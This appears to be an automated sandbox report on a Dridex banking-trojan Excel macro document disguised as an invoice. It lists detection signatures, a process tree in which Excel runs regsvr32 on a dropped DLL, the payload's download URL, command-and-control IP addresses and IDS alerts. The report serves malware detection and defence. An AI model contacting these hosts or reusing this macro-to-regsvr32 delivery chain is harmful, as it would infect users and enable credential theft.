
Analysis Report INV8073565781-20210111319595.xlsm

Overview

General Information

Sample Name: INV8073565781-20210111319595.xlsm
Analysis ID: 338240
MD5: 9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1: 6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256: a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 960 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3008 cmdline: -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2432 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 3068 cmdline: C:\Windows\system32\dwwin.exe -x -s 1016 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., ProcessId: 960
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., ProcessId: 960
Sigma detected: Regsvr32 Anomaly
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll., ProcessId: 960

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://wexfashion.com/k04qkvqu.zip; Avira URL Cloud: Label: malware
Found malware configuration
Source: 4.2.regsvr32.exe.810000.1.raw.unpack; Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for submitted file
Source: INV8073565781-20210111319595.xlsm; Virustotal: Detection: 44%
Source: INV8073565781-20210111319595.xlsm; ReversingLabs: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\cjrumqtd.dll; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\cjrumqtd.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: k04qkvqu[1].zip.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; DNS query: name: wexfashion.com
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 77.220.64.37:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 198.54.125.162:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49302
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49306
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49310
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49314
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49317
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49318
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49321
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49322
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49323
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49323
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49325
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49326
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49327
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49327
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49329
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49330
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49331
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49331
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49333
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49334
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49335
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49335
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49337
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49338
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49339
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49339
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49341
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49342
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49343
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49343
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49345
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49346
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49347
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49347
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49349
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49350
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49351
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49351
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49353
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49354
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49355
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49355
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49357
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49358
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49359
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49359
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49361
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49362
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49363
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49363
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49365
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49366
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49367
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49367
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49369
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49370
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49371
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49371
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49373
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49374
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49377
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49378
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49381
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49382
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49385
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49386
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49389
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49390
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49393
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49394
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49397
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49398
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 80.86.91.27:3308
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 5.100.228.233:3389
Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 46.105.131.65:1512
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 11 Jan 2021 19:47:36 GMTserver: Apachelast-modified: Mon, 11 Jan 2021 08:08:04 GMTaccept-ranges: bytescontent-length: 318976content-type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 c1 97 fc 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 7a 04 00 00 60 00 00 00 00 00 00 d0 26 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 82 00 00 8c 00 00 00 00 00 05 00 7c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 86 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 24 00 00 00 10 00 00 00 26 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 40 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 33 00 d8 03 00 00 00 50 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 60 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 46 00 00 00 00 70 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 1b 00 00 
00 80 00 00 00 1c 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 cc 52 04 00 00 a0 00 00 00 54 04 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 7c 2e 00 00 00 00 05 00 00 30 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 09 00 00 00 30 05 00 00 0a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox View | IP Address: 5.100.228.233
Source: Joe Sandbox View | IP Address: 80.86.91.27
Source: Joe Sandbox View | IP Address: 46.105.131.65
Source: Joe Sandbox View | IP Address: 77.220.64.37
Source: Joe Sandbox View | ASN Name: SENTIANL
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-SXB1DE
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
